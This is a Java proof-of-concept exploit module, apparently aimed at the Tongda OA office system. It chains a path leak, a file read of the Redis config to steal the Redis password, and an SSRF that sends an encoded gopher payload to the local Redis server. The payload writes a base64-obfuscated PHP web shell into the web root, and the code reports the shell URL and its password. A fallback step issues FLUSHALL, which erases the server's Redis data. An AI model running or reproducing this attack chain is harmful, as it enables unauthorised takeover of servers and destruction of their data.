package com.xinyu.poc;

import com.xinyu.tools.Other;
import com.xinyu.tools.Request;
import com.xinyu.tools.Response;

import java.awt.*;
import java.util.regex.Pattern;

public class RedisSSRF {
    public static String poc1(String url, String cookie, TextArea textArea) {
        String shell_url = null;
        //1.获取根路径
        Response response = Request.get(url + "/general/approve_center/archive/getTableStruc.php", cookie);
        //"logPath": "C:/MYOA\\logs\\Workflow\\Log_2021_03_08.log",
        String web_path = Other.dataCleaning(response.getText(), Pattern.compile("\"logPath\": \"(.+?)\\\\"));
        System.out.println("\n获取的根路径: " + web_path);

        //当前用户权限可以拿到物理路径
        if (web_path == null) {
            textArea.append("\n获取物理路径失败|尝试测试默认值-->D:/MYOA");
            web_path = "D:/MYOA";
        } else {
            textArea.append("\n获取物理路径成功-->" + web_path);
        }

        //2.读取Redis密码
        String requirepass;
        Response response2 = Request.get(url + "/ispirit/im/photo.php?UID=1&AVATAR_FILE=" + web_path + "/bin/redis.windows.conf", cookie);
        requirepass = Other.dataCleaning(response2.getText(), Pattern.compile("requirepass (.+?)\r"));
        if (requirepass != null) {
            textArea.append("\n读取Redis密码成功-->" + requirepass);
            System.out.println(requirepass);

            int requirepass_len = requirepass.length();
            int web_path_len = web_path.length() + 8;
            int log_path_len = web_path.length() + 18;
            System.out.println(requirepass_len);

            //3.Redis/SSRF/gopher协议 写文件
            String random_filename = Other.getRandomFileName();
            System.out.println(random_filename);
            String payload = "%67%6f%70%68%65%72%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%3a%36%33%39%39%2f%5f%25%32%61%25%33%32%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%34%31%25%35%35%25%35%34%25%34%38%25%30%64%25%30%61%25%32%34" + requirepass_len + "%25%30%64%25%30%61" + requirepass + "%25%30%64%25%30%61%25%32%61%25%33%32%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%30%64%25%30%61%25%33%37%25%30%64%25%30%61%25%32%61%25%33%33%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%30%64%25%30%61%25%37%38%25%30%64%25%30%61%25%32%34%25%33%32%25%33%30%25%33%32%25%30%64%25%30%61%25%35%63%25%36%65%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%36%36%25%36%39%25%36%63%25%36%35%25%35%66%25%37%30%25%37%35%25%37%34%25%35%66%25%36%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%37%33%25%32%38%25%32%34%25%35%66%25%35%33%25%34%35%25%35%32%25%35%36%25%34%35%25%35%32%25%35%62%25%32%32%25%34%34%25%34%66%25%34%33%25%35%35%25%34%64%25%34%35%25%34%65%25%35%34%25%35%66%25%35%32%25%34%66%25%34%66%25%35%34%25%32%32%25%35%64%25%32%65%25%32%32%25%32%66%25%32%66" + random_filename + ".php" + "%25%32%32%25%32%63%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%35%66%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%38%25%32%32%25%35%30%25%34%34%25%33%39%25%37%37%25%36%31%25%34%38%25%34%31%25%36%37%25%34%61%25%34%37%25%34%35%25%33%39%25%34%39%25%36%65%25%33%34%25%37%32%25%35%61%25%34%33%25%36%37%25%37%30%25%34%39%25%36%63%25%33%34%25%36%39%25%34%39%25%35%38%25%37%33%25%37%32%25%36%35%25%33%33%25%33%30%25%36%39%25%34%66%25%37%39%25%35%32%25%36%39%25%35%30%25%35%33%25%35%32%25%33%37%25%34%61%25%34%37%25%34%36%25%33%39%25%35%37%25%37%39%25%34%61%25%33%34%25%34%39%25%36%63%25%33%30%25%33%37%25%35%61%25%35%38%25%35%61%25%36%38%25%36%32%25%34%33%25%36%37%25%36%39%25%34%39%25%36%39%25%33%34%25%36%62%25%35%39%25%36%39%25%36%62%25%33%37%25%35%30%25%37%61%25%33%34%25%33%64%25%32%32%25%32%39%25%32%65%25%32%32" + random_filename + "%25%32%32%25%32%39%25%33%62%25%33%66%25%33%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%37%35%25%36%65%25%36%63%25%36%39%25%36%65%25%36%62%25%32%38%25%35%66%25%35%66%25%34%36%25%34%39%25%34%63%25%34%35%25%35%66%25%35%66%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%35%63%25%36%65%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%36%34%25%36%39%25%37%32%25%30%64%25%30%61%25%32%34" + web_path_len + "%25%30%64%25%30%61" + web_path + "%25%32%66%25%37%37%25%36%35%25%36%32%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%33%30%25%30%64%25%30%61%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%30%64%25%30%61%25%32%34%25%33%31%25%33%31%25%30%64%25%30%61%25%33%32%25%36%65%25%33%38%25%35%37%25%35%37%25%33%38%25%34%35%25%32%65%25%37%30%25%36%38%25%37%30%25%30%64%25%30%61%25%32%61%25%33%31%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61%25%32%61%25%33%32%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%36%34%25%36%35%25%36%63%25%30%64%25%30%61%25%32%34%25%33%31%25%30%64%25%30%61%25%37%38%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%36%34%25%36%39%25%37%32%25%30%64%25%30%61%25%32%34" + log_path_len + "%25%30%64%25%30%61" + web_path + "%25%32%66%25%36%31%25%37%34%25%37%34%25%36%31%25%36%33%25%36%38%25%32%66%25%37%32%25%36%35%25%36%34%25%36%39%25%37%33%25%35%66%25%36%34%25%36%31%25%37%34%25%36%31%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%33%30%25%30%64%25%30%61%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%30%64%25%30%61%25%32%34%25%33%38%25%30%64%25%30%61%25%36%34%25%37%35%25%36%64%25%37%30%25%32%65%25%37%32%25%36%34%25%36%32%25%30%64%25%30%61%25%32%61%25%33%30%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%37%31%25%37%35%25%36%39%25%37%34%25%30%64%25%30%61";
            Request.get(url + "/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=" + payload, cookie);
            Request.get(url + "/2n8WW8E.php");
            Response response3 = Request.get(url + "/" + random_filename + ".php");
            if (response3.getText().contains(random_filename)) {
                System.out.println("利用成功");
                shell_url = url + "/" + random_filename + ".php\n密码:x";
            } else {
                //如果能执行到这里说明redis生成文件脏数据过多导致无法执行php代码
                //这里会执行flushall命令,清空redis缓存数据尝试重新利用
                textArea.append("\nRedis生成文件脏数据过多|尝试执行其flushall命令");
                System.out.println("这里会执行flushall命令,清空redis缓存数据尝试重新利用");
                payload = "%67%6f%70%68%65%72%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%3a%36%33%39%39%2f%5f%25%32%61%25%33%32%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%34%31%25%35%35%25%35%34%25%34%38%25%30%64%25%30%61%25%32%34" + requirepass_len + "%25%30%64%25%30%61" + requirepass + "%25%30%64%25%30%61%25%32%61%25%33%31%25%30%64%25%30%61%25%32%34%25%33%38%25%30%64%25%30%61%25%36%36%25%36%63%25%37%35%25%37%33%25%36%38%25%36%31%25%36%63%25%36%63%25%30%64%25%30%61%25%32%61%25%33%32%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%30%64%25%30%61%25%33%37%25%30%64%25%30%61%25%32%61%25%33%33%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%30%64%25%30%61%25%37%38%25%30%64%25%30%61%25%32%34%25%33%32%25%33%30%25%33%32%25%30%64%25%30%61%25%35%63%25%36%65%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%36%36%25%36%39%25%36%63%25%36%35%25%35%66%25%37%30%25%37%35%25%37%34%25%35%66%25%36%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%37%33%25%32%38%25%32%34%25%35%66%25%35%33%25%34%35%25%35%32%25%35%36%25%34%35%25%35%32%25%35%62%25%32%32%25%34%34%25%34%66%25%34%33%25%35%35%25%34%64%25%34%35%25%34%65%25%35%34%25%35%66%25%35%32%25%34%66%25%34%66%25%35%34%25%32%32%25%35%64%25%32%65%25%32%32%25%32%66%25%32%66" + random_filename + "%25%32%65%25%37%30%25%36%38%25%37%30%25%32%32%25%32%63%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%35%66%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%38%25%32%32%25%35%30%25%34%34%25%33%39%25%37%37%25%36%31%25%34%38%25%34%31%25%36%37%25%34%61%25%34%37%25%34%35%25%33%39%25%34%39%25%36%65%25%33%34%25%37%32%25%35%61%25%34%33%25%36%37%25%37%30%25%34%39%25%36%63%25%33%34%25%36%39%25%34%39%25%35%38%25%37%33%25%37%32%25%36%35%25%33%33%25%33%30%25%36%39%25%34%66%25%37%39%25%35%32%25%36%39%25%35%30%25%35%33%25%35%32%25%33%37%25%34%61%25%34%37%25%34%36%25%33%39%25%35%37%25%37%39%25%34%61%25%33%34%25%34%39%25%36%63%25%33%30%25%33%37%25%35%61%25%35%38%25%35%61%25%36%38%25%36%32%25%34%33%25%36%37%25%36%39%25%34%39%25%36%39%25%33%34%25%36%62%25%35%39%25%36%39%25%36%62%25%33%37%25%35%30%25%37%61%25%33%34%25%33%64%25%32%32%25%32%39%25%32%65%25%32%32" + random_filename + "%25%32%32%25%32%39%25%33%62%25%33%66%25%33%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%37%35%25%36%65%25%36%63%25%36%39%25%36%65%25%36%62%25%32%38%25%35%66%25%35%66%25%34%36%25%34%39%25%34%63%25%34%35%25%35%66%25%35%66%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%35%63%25%36%65%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%36%34%25%36%39%25%37%32%25%30%64%25%30%61%25%32%34" + web_path_len + "%25%30%64%25%30%61" + web_path + "%25%32%66%25%37%37%25%36%35%25%36%32%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%33%30%25%30%64%25%30%61%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%30%64%25%30%61%25%32%34%25%33%31%25%33%31%25%30%64%25%30%61%25%33%32%25%36%65%25%33%38%25%35%37%25%35%37%25%33%38%25%34%35%25%32%65%25%37%30%25%36%38%25%37%30%25%30%64%25%30%61%25%32%61%25%33%31%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61%25%32%61%25%33%32%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%36%34%25%36%35%25%36%63%25%30%64%25%30%61%25%32%34%25%33%31%25%30%64%25%30%61%25%37%38%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%36%34%25%36%39%25%37%32%25%30%64%25%30%61%25%32%34" + log_path_len + "%25%30%64%25%30%61" + web_path + "%25%32%66%25%36%31%25%37%34%25%37%34%25%36%31%25%36%33%25%36%38%25%32%66%25%37%32%25%36%35%25%36%34%25%36%39%25%37%33%25%35%66%25%36%34%25%36%31%25%37%34%25%36%31%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%33%30%25%30%64%25%30%61%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%30%64%25%30%61%25%32%34%25%33%38%25%30%64%25%30%61%25%36%34%25%37%35%25%36%64%25%37%30%25%32%65%25%37%32%25%36%34%25%36%32%25%30%64%25%30%61%25%32%61%25%33%30%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%37%31%25%37%35%25%36%39%25%37%34%25%30%64%25%30%61";
                Request.get(url + "/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=" + payload, cookie);
                Request.get(url + "/2n8WW8E.php");
                Response response4 = Request.get(url + "/" + random_filename + ".php");
                if (response4.getText().contains(random_filename)) {
                    System.out.println("利用成功");

                    shell_url = url + "/" + random_filename + ".php\n密码:x";
                    System.out.println(shell_url);
                }
            }
        }
        return shell_url;
    }
}
